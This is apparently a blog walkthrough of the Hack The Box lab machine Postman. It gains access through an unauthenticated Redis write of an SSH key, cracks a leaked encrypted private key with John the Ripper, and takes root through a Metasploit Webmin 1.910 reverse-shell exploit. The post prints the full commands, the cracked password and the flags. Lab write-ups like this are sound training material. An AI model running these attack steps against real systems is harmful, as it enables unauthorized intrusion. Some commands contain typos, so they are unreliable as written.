Postman is an easy box on Hack The Box, but rooting it was far from easy. This was mainly due to the exploit that was available for the initial access. There was a method described in the Kali Linux Cookbook which included an action for clearing SSH keys. You guessed it, keys were cleared every time I was running the exploit.
[0x1] Reconnaissance & Enumeration
A standard scan with scripts, version detection and open ports. A striking feature is the presence of Redis on port 6379 and Webmin on port 10000.
nmap -sV -sC -A 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.027s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.75 seconds
[0x2] Initial Foothold
My guess is on the Redis Service for now. Let’s try to find out if it’s vulnerable. The redis tools are necessary for executing the exploit manually. The tools are easy to install via apt-get .
sudo apt-get install redis-tools
The first step is to create a key pair with private and public key on my own machine. These keys will soon be used to upload to the Postman box.
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/user/.ssh/id_rsa.
Your public key has been saved in /home/user/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:beHPkT0RV/HCvmeypfVMyj0q3n/GVhjs8ykudoJQeoI
The key's randomart image is:
+---[RSA 3072]----+
| ..=|
| . o.|
| . . + .|
| + + * o |
| . S * + * .|
| E + o o * X |
| + . + X.B|
| o - OoB.|
| ..+.@=o |
+----[SHA256]-----+
I copy the contents of the public key to the file mykey.txt and add two empty lines above and other.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > mykey.txt
The last step consists of copying the pulic key via the redis-cli to the box. With this the key of my machine is stored on the server. Before the key is usable I change the directory to /var/lib/redis/.ssh. This is the home directory for the Redis user where the eky must be kept in order to use.
cat mykey.txt | redis-cli -h 10.10.10.160 -x set team200
$ redis-cli -h 10.10.10.160
$ 10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
OK
$ 10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
$ 10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
$ 10.10.10.160:6379> save
OK
With the key in place I can connect via SSH without a password and only with the key and the username: redis .
ssh -i id_rsa.pub redis@10.10.10.160
[0x3] Path to User flag
Now that I have an SSH session I check the home directory to see which other users are present on this box. I only run into a user Matt in /home.
cd /home
ls
Matt
The machine does not contain many interesting folders and files. There is a file in the /opt directory that normally wouldn’t be there. The file id_rsa.bak appears to be a backup file of a key. This key may belong to the user Matt.
cd /opt
ls
id_rsa.bak
I copy the contents of id_rsa.bak to my own machine and create the file here. The content clearly shows that this is a private key. Useful!
cat id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEG
An SSH key cannot be processed directly by John The Ripper. Using ssh2john , I convert the file into a workable format and save it in a new file called id_rsa_ready4john.txt .
python /usr/share/john/ssh2john.py id_rsa |tale id_rsa_ready4john.txt
Passwords within Hack The Box can generally be found via the Rockyou glossary. John the Ripper will get to work to retrieve the password of the private key and is ready within 8 seconds.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:08 DONE (2020-02-08 19:23) 0.1133g/s 1626Kp/s 1626Kc/s 1626KC/sa6_123..*7¡Vamos!
Session completed
There we have it, the password of the private key: computer2008.
computer2008 (id_rsa)
My first guess is that the private key makes it possible to log in via SSH. Just like with the user ‘redis’. New to me is the message that it is an unprotected key. This turns out to be a permission ‘thing’.
ssh -i id_rsa Matt@10.10.10.160
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
Adjusting permissions by means of chmod 600 is enough to reset the security.
chmod 600 id_rsa
Unfortunately, logging in with Matt’s account is not possible because he has deny access to SSH. Still, I now have his password and can still use the account to potentially grab the user flag. Using su I can call Matt’s account and successfully log in with the cracked password.
su Matt
whoami
Matt
Once logged in as Matt, it is only a matter of checking whether the user flag can be found in the well-known place.
cat /home/Matt/user.txt
517ad0ec2458ca97af8d93aac08a2f3c
[0x4] Path to Root flag
Now looking for the root flag. While scanning the box, I came across port 10000 known as Webmin’s default port. Chances are Webmin is part of the path to root. According to my Nmap scan, version 1.910 is running.
10000/tcp open http MiniServ 1.910 (Webmin httpd)
Through my browser I can indeed see that Webmin is active on this port. Webmin is software for managing a server and is often used by hosting providers. You can compare it with, for example, Plesk.
Chances are there is a vulnerability in Webmin that can be used to gain root access to Postman. Via Searchsploit I check if there are known vulnerabilities for this version of Webmin,
searchsploit Webmin
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit) | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt
--------------------------------------------------------------------------------------------------- ----------------------------------------
Bingo, there is a vulnerability in version 1.910 where a Remote Command Execution (RCE) is possible in the Package Update function.
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
Time to fire up Metasploit. The exploit is most likely already present in the standard modules. If not, it can always be added manually of course.
msfconsole
***
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
https://metasploit.com
=[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
The Webmin exploit module is indeed present in Metasploit in / exploit / linux / http / webmin_packageup_rce . It is a Remote Code Execution vulnerability that makes it possible to get a shell if the user under which Webmin is running in the background.
msf5 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
3 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
4 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
To use the exploit it is necessary to have a Webmin account. That’s good because Matt’s account is suitable for this. The website runs via HTTPS, so SSL must also be set to true.
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.14.103
LHOST => 10.10.14.103
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true
The exploit runs successfully and a Command Shell opens neatly. I upgrade the command shel to a full shell by means of: shell .
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.103:4444
[+] Session cookie: c185d9f5bf7e67c165089eb362c2b59b
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.103:4444 -> 10.10.10.160:34076) at 2020-02-08 20:05:47 +0000
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
The shell starts in the packages-update folder on Postman. By means of whoami I see that I have a shell on Postman as root and now the only thing left to do is grab the root flag.
pwd
/usr/share/webmin/package-updates/
# whoami
whoami
root
There it is, 32 bytes long and the end point of this Redis / Webmin box. Personally, I thought this was the least fun box so far. This is purely due to the use of certain Redis exploits by other hackers because a flush all command is used here. This ensures that my newly placed key was deleted again.
# cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce
[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]
Add comment